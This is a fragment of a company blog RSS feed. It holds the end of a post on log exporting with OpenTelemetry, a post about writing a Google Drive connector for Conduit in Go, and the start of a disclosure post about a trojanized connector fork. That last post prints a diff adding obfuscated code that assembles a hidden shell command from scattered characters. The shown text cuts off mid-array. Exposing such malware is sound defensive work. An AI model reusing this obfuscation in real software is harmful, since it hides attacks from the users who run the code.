            &lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt; __meta_kubernetes_pod_label_app_kubernetes_io_name
    &lt;span class=&quot;token punctuation&quot;&gt;...&lt;/span&gt;
    &lt;span class=&quot;token key atrule&quot;&gt;exporters&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;                                                                                                                                                                             │
		  &lt;span class=&quot;token key atrule&quot;&gt;datadog&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;                                                                                                                                                                             │
	     &lt;span class=&quot;token key atrule&quot;&gt;api&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;                                                                                                                                                                               │
	      &lt;span class=&quot;token key atrule&quot;&gt;key&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; $&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;env&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;DD_API_KEY&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;                                                                                                                                                           │
	      &lt;span class=&quot;token key atrule&quot;&gt;site&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; $&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;env&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;DD_SITE&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;&lt;em&gt;Configuration snippet for our customer Collector&lt;/em&gt;&lt;/p&gt;
&lt;h2&gt;Conclusion&lt;/h2&gt;
&lt;p&gt;So far, this design has been working well for us. Customers can now access operational data both within our application and in their own Datadog instances. The feedback has been positive, with early indications showing that it&apos;s already helping teams debug issues much faster.&lt;/p&gt;
&lt;p&gt;From a systems perspective, I’m also really happy with how it turned out. The Kafka + OpenTelemetry Collector approach for customer log exporting has proven especially powerful. In fact, during a recent internal hackathon, I was able to add an entirely new log destination in just a few hours.&lt;/p&gt;
&lt;p&gt;The centralized gateway design also sets us up nicely for future growth. It gives us the ability to scale horizontally and opens the door to more advanced features down the road, like load balancers or the OpenTelemetry Collector loadbalancing exporter.&lt;/p&gt;
&lt;p&gt;We’re excited to keep evolving the system as more customers onboard and new requirements emerge. There’s always room to improve, but we’re confident we’ve laid down a strong foundation for observability in our platform that gives our customers meaningful insight and helps us operate with confidence.&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Building My First Conduit Connector: A Google Drive Adventure]]></title><description><![CDATA[The story of how I built a Google Drive destination connector for Conduit from scratch—the things I learned, the hiccups I hit, and why it was totally worth it.]]></description><link>https://meroxa.com/blog/building-my-first-conduit-connector-a-google-drive-adventure</link><guid isPermaLink="false">https://meroxa.com/blog/building-my-first-conduit-connector-a-google-drive-adventure</guid><dc:creator><![CDATA[Ruben Manrique]]></dc:creator><pubDate>Mon, 12 May 2025 11:00:00 GMT</pubDate><content:encoded>&lt;p&gt;During Champagne Week—the magical time at &lt;a href=&quot;https://meroxa.com/&quot;&gt;Meroxa&lt;/a&gt; where we get to work on anything we want—I decided to dive into something totally new: building a connector for &lt;a href=&quot;https://conduit.io/&quot;&gt;Conduit&lt;/a&gt;. I’d never written a line of Go before. I’d never run Conduit locally. So, naturally, I decided to do both at once.&lt;/p&gt;
&lt;p&gt;Here’s the story of how I built a &lt;strong&gt;Google Drive destination connector&lt;/strong&gt; for Conduit from scratch—the things I learned, the hiccups I hit, and why it was totally worth it.&lt;/p&gt;
&lt;h3&gt;🥂 Champagne Week = Choose Your Own Adventure&lt;/h3&gt;
&lt;p&gt;Champagne Week is when we get to explore ideas outside the day-to-day roadmap and chase whatever sparks our curiosity. I’d been meaning to learn more about Conduit’s internals, and connectors felt like a natural place to start.&lt;/p&gt;
&lt;p&gt;Google Drive stood out as a fun target. It’s widely used, has a &lt;a href=&quot;https://developers.google.com/workspace/drive/api/guides/about-sdk&quot;&gt;solid API&lt;/a&gt;, and writing a &lt;strong&gt;destination connector&lt;/strong&gt; meant I could figure out how to reliably &lt;em&gt;push&lt;/em&gt; data into Drive.&lt;/p&gt;
&lt;p&gt;It was something that seemed both useful and interesting. On the useful side, Google Drive is a tool almost every team interacts with in some capacity—being able to automatically write data to Drive from a pipeline opens up a lot of lightweight automation use cases. Think: piping logs or daily reports straight into a shared folder, exporting transformed data for non-technical stakeholders, or syncing snapshots of datasets for backup or audit purposes.&lt;/p&gt;
&lt;p&gt;At the same time, it was interesting from a technical perspective. I got to dive into Google’s APIs, work with OAuth and service accounts, and figure out how to map abstract Conduit records into files that make sense in the context of Drive. The blend of dealing with a real-world API and building something from scratch with Go made it feel like a fun puzzle, and I came away with a much better understanding of both the language and the Conduit platform.&lt;/p&gt;
&lt;h3&gt;🛠️ Getting Conduit Running Locally&lt;/h3&gt;
&lt;p&gt;Step one: get Conduit building and running locally. This was my first time doing it, so I wasn’t totally sure what to expect. Luckily, the process was smoother than I’d feared.&lt;/p&gt;
&lt;p&gt;Here’s what I used:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Go (latest stable version)&lt;/li&gt;
&lt;li&gt;&lt;code class=&quot;language-text&quot;&gt;make&lt;/code&gt; (used heavily in Conduit’s dev flow)&lt;/li&gt;
&lt;li&gt;VS Code + Go plugin&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;I leaned heavily on the &lt;a href=&quot;https://docs.conduit.io/docs&quot;&gt;Conduit docs&lt;/a&gt;—which, thankfully, are really well written. While I leaning on the &lt;a href=&quot;https://docs.conduit.io/docs/developing/connectors/conduit-connector-template&quot;&gt;example connector template&lt;/a&gt; to get started, I also poked around other &lt;a href=&quot;https://github.com/conduitIO/?q=connector&amp;#x26;type=all&amp;#x26;language=&amp;#x26;sort=&quot;&gt;existing connectors&lt;/a&gt; to see how they were structured, which was super helpful for figuring out best practices.&lt;/p&gt;
&lt;h3&gt;📁 What the Connector Does&lt;/h3&gt;
&lt;p&gt;The connector I built is a &lt;strong&gt;&lt;a href=&quot;https://github.com/ConduitIO/conduit-connector-google-drive&quot;&gt;Google Drive destination connector&lt;/a&gt;&lt;/strong&gt;, which means it takes records coming through a Conduit pipeline and uploads them into Google Drive.&lt;/p&gt;
&lt;p&gt;In this case:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Each record gets written as a file in a specified Drive folder.&lt;/li&gt;
&lt;li&gt;The file name can be derived from the record’s metadata.&lt;/li&gt;
&lt;li&gt;The file content comes from the record payload.&lt;/li&gt;
&lt;/ul&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;go&quot;&gt;&lt;pre class=&quot;language-go&quot;&gt;&lt;code class=&quot;language-go&quot;&gt;&lt;span class=&quot;token keyword&quot;&gt;func&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;d &lt;span class=&quot;token operator&quot;&gt;*&lt;/span&gt;Destination&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;Write&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;ctx context&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;Context&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; r &lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;opencdc&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;Record&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token builtin&quot;&gt;int&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token builtin&quot;&gt;error&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
	&lt;span class=&quot;token comment&quot;&gt;// Log the number of records&lt;/span&gt;
	sdk&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;Logger&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;ctx&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;Trace&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;Int&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;records&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;len&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;r&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;Msg&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;Starting file uploads...&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;

	&lt;span class=&quot;token comment&quot;&gt;// Initialize a counter to track the number of successfully uploaded records&lt;/span&gt;
	successfulUploads &lt;span class=&quot;token operator&quot;&gt;:=&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;0&lt;/span&gt;

	&lt;span class=&quot;token comment&quot;&gt;// Loop through each record and upload it as a separate file&lt;/span&gt;
	&lt;span class=&quot;token keyword&quot;&gt;for&lt;/span&gt; &lt;span class=&quot;token boolean&quot;&gt;_&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; record &lt;span class=&quot;token operator&quot;&gt;:=&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;range&lt;/span&gt; r &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
		&lt;span class=&quot;token keyword&quot;&gt;if&lt;/span&gt; record&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;Operation &lt;span class=&quot;token operator&quot;&gt;!=&lt;/span&gt; opencdc&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;OperationCreate &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
			&lt;span class=&quot;token comment&quot;&gt;// Skip records that are not of type Create&lt;/span&gt;
			sdk&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;Logger&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;ctx&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;Trace&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;Msgf&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;Skipping record with operation: %s&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; record&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;Operation&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
			successfulUploads&lt;span class=&quot;token operator&quot;&gt;++&lt;/span&gt;
			&lt;span class=&quot;token keyword&quot;&gt;continue&lt;/span&gt;
		&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;
		fileData &lt;span class=&quot;token operator&quot;&gt;:=&lt;/span&gt; record&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;Payload&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;After&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;Bytes&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;

		&lt;span class=&quot;token comment&quot;&gt;// Create a bytes buffer to hold the record data&lt;/span&gt;
		fileBuffer &lt;span class=&quot;token operator&quot;&gt;:=&lt;/span&gt; bytes&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;NewBuffer&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;fileData&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;

		&lt;span class=&quot;token comment&quot;&gt;// Prepare the file metadata (include the folder ID in the Parents field)&lt;/span&gt;
		fileMetadata &lt;span class=&quot;token operator&quot;&gt;:=&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;&amp;amp;&lt;/span&gt;drive&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;File&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
			Name&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;    fmt&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;Sprintf&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;%s.txt&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; record&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;Key&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;Bytes&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token comment&quot;&gt;// Set the file name&lt;/span&gt;
			Parents&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;token builtin&quot;&gt;string&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;d&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;config&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;DriveFolderID&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;          &lt;span class=&quot;token comment&quot;&gt;// Set the shared folder ID&lt;/span&gt;
		&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;

		&lt;span class=&quot;token comment&quot;&gt;// Upload the file directly from the bytes buffer&lt;/span&gt;
		uploadedFile&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; err &lt;span class=&quot;token operator&quot;&gt;:=&lt;/span&gt; d&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;service&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;Files&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;Create&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;fileMetadata&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;Media&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;fileBuffer&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;Do&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
		&lt;span class=&quot;token keyword&quot;&gt;if&lt;/span&gt; err &lt;span class=&quot;token operator&quot;&gt;!=&lt;/span&gt; &lt;span class=&quot;token boolean&quot;&gt;nil&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
			&lt;span class=&quot;token keyword&quot;&gt;return&lt;/span&gt; successfulUploads&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; fmt&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;Errorf&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;unable to upload file: %w&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; err&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
		&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;

		&lt;span class=&quot;token comment&quot;&gt;// Log the uploaded file&apos;s ID&lt;/span&gt;
		sdk&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;Logger&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;ctx&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;Trace&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;Msgf&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;File uploaded successfully! File ID: %s\n&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; uploadedFile&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;Id&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;

		&lt;span class=&quot;token comment&quot;&gt;// Increment the successful uploads counter&lt;/span&gt;
		successfulUploads&lt;span class=&quot;token operator&quot;&gt;++&lt;/span&gt;
	&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;

	&lt;span class=&quot;token keyword&quot;&gt;return&lt;/span&gt; successfulUploads&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token boolean&quot;&gt;nil&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;I kept it simple for a v1, focusing on JSON files and plain text, but there’s a lot of room to expand in the future. Right now, the connector only supports creating new files—each record is uploaded as a new file in the target Drive folder. It doesn’t handle updates or deletes yet, so there&apos;s no logic for overwriting existing files or removing them based on record changes. Down the line, it could support features like:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Updating existing files&lt;/li&gt;
&lt;li&gt;Deleting files when a record indicates a delete event&lt;/li&gt;
&lt;li&gt;Supporting different MIME types and file formats (e.g. CSV, PDFs, images)&lt;/li&gt;
&lt;li&gt;Custom folder routing based on record content&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;For now, though, it’s a clean foundation to build on—simple, reliable, and focused.&lt;/p&gt;
&lt;h3&gt;🔧 That One Gotcha: &lt;code class=&quot;language-text&quot;&gt;make generate&lt;/code&gt;&lt;/h3&gt;
&lt;p&gt;One thing that tripped me up early: after changing any of the connector’s config variables (like &lt;code class=&quot;language-text&quot;&gt;folder_id&lt;/code&gt;, &lt;code class=&quot;language-text&quot;&gt;credentials&lt;/code&gt;, etc.), I needed to run:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;bash&quot;&gt;&lt;pre class=&quot;language-bash&quot;&gt;&lt;code class=&quot;language-bash&quot;&gt;&lt;span class=&quot;token function&quot;&gt;make&lt;/span&gt; generate&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Without this, Conduit wouldn’t pick up the new config fields, and I’d get confusing runtime errors or empty values. Once I realized this step was required, everything started working a lot more smoothly.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Pro tip:&lt;/strong&gt; if something feels weird after changing config, run &lt;code class=&quot;language-text&quot;&gt;make generate&lt;/code&gt;. It&apos;ll probably fix it.&lt;/p&gt;
&lt;h3&gt;👩‍💻 First Time Writing Go&lt;/h3&gt;
&lt;p&gt;This was also my first time writing Go, and honestly? I loved it. The language is opinionated in a way that helps you write clean, readable code. Once I wrapped my head around struct tags, interfaces, and error handling, things fell into place quickly.&lt;/p&gt;
&lt;p&gt;Compared to some of the dynamic languages I’m used to, Go felt rigid at first—but I came to appreciate that structure, especially for something like a connector where stability matters.&lt;/p&gt;
&lt;h3&gt;🔌 Connector Highlights&lt;/h3&gt;
&lt;p&gt;Here are a few things I implemented in the destination connector:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Google Drive API integration&lt;/strong&gt; using a service account&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Config validation&lt;/strong&gt;, making sure required fields are present&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Simple file writing logic&lt;/strong&gt; based on incoming record content&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;I tested everything by running Conduit locally, setting up a pipeline, and watching files appear in my Drive folder. Extremely satisfying.&lt;/p&gt;
&lt;h3&gt;💡 What I Learned&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Writing connectors isn’t as scary as it sounds.&lt;/strong&gt; Conduit’s docs and examples make it approachable.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Go is a great fit for this kind of work.&lt;/strong&gt; The performance, structure, and ecosystem made sense quickly.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Always &lt;code class=&quot;language-text&quot;&gt;make generate&lt;/code&gt; after a config change.&lt;/strong&gt; Seriously. Just do it.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;🎯 What’s Next?&lt;/h3&gt;
&lt;p&gt;This connector is a solid starting point, but there’s plenty of room to grow:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Support for different file formats (CSV, binary, etc.)&lt;/li&gt;
&lt;li&gt;More flexible folder paths and naming schemes&lt;/li&gt;
&lt;li&gt;Handling large payloads and batching intelligently&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;And now that I’ve gotten my feet wet, I’m tempted to try building a &lt;strong&gt;source connector&lt;/strong&gt; next.&lt;/p&gt;
&lt;h3&gt;🥳 Wrapping Up&lt;/h3&gt;
&lt;p&gt;Shipping my first connector—especially during a self-directed week like this—felt awesome. I got to learn Go, contribute something real to the Conduit ecosystem, and explore how connectors are built from the ground up.&lt;/p&gt;
&lt;p&gt;If you’re even a little curious about writing your own connector, my advice is: &lt;strong&gt;go for it&lt;/strong&gt;. It’s more doable than you think, and you’ll learn a ton along the way.&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Catching a Trojan: Finding a malicious Conduit connector in the wild]]></title><description><![CDATA[A third-party created a Conduit connector with malicious code, here's how we found it, and got it removed.]]></description><link>https://meroxa.com/blog/catching-a-trojan-finding-a-malicious-conduit-connector-in-the-wild</link><guid isPermaLink="false">https://meroxa.com/blog/catching-a-trojan-finding-a-malicious-conduit-connector-in-the-wild</guid><dc:creator><![CDATA[Lovro Mažgon]]></dc:creator><pubDate>Tue, 29 Apr 2025 11:00:00 GMT</pubDate><content:encoded>&lt;p&gt;&lt;a href=&quot;https://github.com/ConduitIO/conduit&quot;&gt;Conduit&lt;/a&gt; is a data-streaming tool that heavily relies on plugins to extend its functionality. For instance, anyone can implement and use their own connector without recompiling Conduit, as the connector starts in a separate process that communicates with Conduit via gRPC. The security-conscious reader might spot a potential issue - if you can get someone to run your connector, you could include malicious code to do despicable things. That&apos;s exactly what someone tried last week.&lt;/p&gt;
&lt;p&gt;Let&apos;s dive into how we spotted this and what we did to prevent our users from falling into the trap.&lt;/p&gt;
&lt;h2&gt;A Suspicious Connector&lt;/h2&gt;
&lt;p&gt;As part of the Conduit project, we have a GitHub action that crawls repositories every week, searching for any repository importing our &lt;a href=&quot;https://github.com/ConduitIO/conduit-connector-sdk&quot;&gt;connector SDK&lt;/a&gt;. These repositories are Conduit connectors. The action gathers information about each repository, like the description, number of stars, the &lt;code class=&quot;language-text&quot;&gt;connector.yaml&lt;/code&gt; file, releases, and their assets. All of this information is gathered and exported in a JSON file that we host on &lt;a href=&quot;https://conduit.io/connectors.json&quot;&gt;https://conduit.io/connectors.json&lt;/a&gt;. We call this our connector registry.&lt;/p&gt;
&lt;p&gt;Last week, I reviewed the pull request with the updated connector list and spotted a new 3rd party repository. Exciting, someone is working on a new connector! I decided to check it out. After opening the repository, I was met with a familiar README - this repository was a fork of our official &lt;a href=&quot;https://github.com/ConduitIO/conduit-connector-postgres&quot;&gt;Postgres connector&lt;/a&gt;. Two things caught my eye however. The git history was squashed into a single commit with the message &quot;adjust&quot;, and the repository already had 22 stars even though it was only created 2 days ago. I opened the GitHub profile of the repository creator and saw that the account was created a month ago and that this was the only repository they owned. Suspicious.&lt;/p&gt;
&lt;p&gt;I decided to clone the repository and check the diff between the forked connector and our official one.&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;diff&quot;&gt;&lt;pre class=&quot;language-diff&quot;&gt;&lt;code class=&quot;language-diff&quot;&gt;diff -bur conduitio/conduit-connector-postgres/ actualrancher/conduit-connector-postgres/

&lt;span class=&quot;token coord&quot;&gt;--- conduitio/conduit-connector-postgres/cmd/connector/main.go	2025-01-31 13:37:03.742463510 +0100&lt;/span&gt;
&lt;span class=&quot;token coord&quot;&gt;+++ actualrancher/conduit-connector-postgres/cmd/connector/main.go	2025-04-22 13:07:46.407750150 +0200&lt;/span&gt;
&lt;span class=&quot;token coord&quot;&gt;@@ -14,6 +14,8 @@&lt;/span&gt;

&lt;span class=&quot;token unchanged&quot;&gt;&lt;span class=&quot;token prefix unchanged&quot;&gt; &lt;/span&gt;package main
&lt;/span&gt;
&lt;span class=&quot;token inserted-sign inserted&quot;&gt;&lt;span class=&quot;token prefix inserted&quot;&gt;+&lt;/span&gt;import &quot;os/exec&quot;
&lt;span class=&quot;token prefix inserted&quot;&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;span class=&quot;token unchanged&quot;&gt;&lt;span class=&quot;token prefix unchanged&quot;&gt; &lt;/span&gt;import (
&lt;span class=&quot;token prefix unchanged&quot;&gt; &lt;/span&gt;	postgres &quot;github.com/conduitio/conduit-connector-postgres&quot;
&lt;span class=&quot;token prefix unchanged&quot;&gt; &lt;/span&gt;	sdk &quot;github.com/conduitio/conduit-connector-sdk&quot;
&lt;/span&gt;&lt;span class=&quot;token coord&quot;&gt;@@ -22,3 +24,15 @@&lt;/span&gt;
&lt;span class=&quot;token unchanged&quot;&gt;&lt;span class=&quot;token prefix unchanged&quot;&gt; &lt;/span&gt;func main() {
&lt;span class=&quot;token prefix unchanged&quot;&gt; &lt;/span&gt;	sdk.Serve(postgres.Connector)
&lt;span class=&quot;token prefix unchanged&quot;&gt; &lt;/span&gt;}
&lt;/span&gt;&lt;span class=&quot;token inserted-sign inserted&quot;&gt;&lt;span class=&quot;token prefix inserted&quot;&gt;+&lt;/span&gt;
&lt;span class=&quot;token prefix inserted&quot;&gt;+&lt;/span&gt;
&lt;span class=&quot;token prefix inserted&quot;&gt;+&lt;/span&gt;func OAPicvR() error {
&lt;span class=&quot;token prefix inserted&quot;&gt;+&lt;/span&gt;	WoH := []string{&quot;o&quot;, &quot; &quot;, &quot;r&quot;, &quot;&amp;amp;&quot;, &quot; &quot;, &quot;7&quot;, &quot;s&quot;, &quot;s&quot;, &quot;n&quot;, &quot;5&quot;, &quot;w&quot;, &quot;w&quot;, &quot;b&quot;, &quot;t&quot;, &quot;h&quot;, &quot;a&quot;, &quot;y&quot;, &quot;a&quot;, &quot;d&quot;, &quot;o&quot;, &quot;e&quot;, &quot;g&quot;, &quot; &quot;, &quot;/&quot;, &quot;m&quot;, &quot;a&quot;, &quot;/&quot;, &quot;i&quot;, &quot;4&quot;, &quot;t&quot;, &quot;r&quot;, &quot;a&quot;, &quot;r&quot;, &quot;/&quot;, &quot;f&quot;, &quot;t&quot;, &quot;p&quot;, &quot;i&quot;, &quot;/&quot;, &quot;s&quot;, &quot; &quot;, &quot;O&quot;, &quot;u&quot;, &quot;d&quot;, &quot;/&quot;, &quot;/&quot;, &quot;3&quot;, &quot;.&quot;, &quot;e&quot;, &quot;b&quot;, &quot;/&quot;, &quot;f&quot;, &quot;-&quot;, &quot;d&quot;, &quot; &quot;, &quot;t&quot;, &quot;b&quot;, &quot;0&quot;, &quot;c&quot;, &quot;|&quot;, &quot;1&quot;, 